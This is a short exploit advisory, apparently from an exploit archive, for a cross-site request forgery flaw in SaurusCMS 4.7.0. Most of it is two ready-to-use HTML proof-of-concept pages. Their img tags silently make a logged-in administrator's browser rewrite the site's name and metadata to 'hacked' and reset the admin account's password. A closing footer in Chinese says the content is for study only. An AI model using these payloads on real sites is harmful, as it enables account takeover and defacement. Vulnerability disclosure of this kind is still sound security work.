# Author: Fady Mohammed Osman (cute hacker) # Software Link: http://www.saurus.info/download/SaurusCMS-4.7.0.tgz # Version: 4.7.0 # Tested on: Ubuntu 10.04 # CVE : [Not available] # This vulnerability allows a malicious hacker to change password of a user and also it allows changing the website information. PoC 1: <html> <head><title>Saurus CSRF : Change site information</title></head> <body> <img src="http://localhost/saurus/admin/change_config.php?group=1&site_name=hacked+by+cutehacker&slogan=hacked&meta_title=hacked&meta_description=hacked&meta_keywords=hacked&save=1&flt_keel=1&page_end_html=&timezone="> </body> </html> PoC 2: <html> <head><title>Saurus CSRF : Change user's password</title></head> <body> <img src="http://localhost/saurus/admin/edit_user.php?tab=account&user_id=19&group_id=1&op=edit&op2=save&username=admin&password=hacked&password_confirmation=hacked&pass_expires=01.01.2029&is_predefined=1"> </body> </html>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论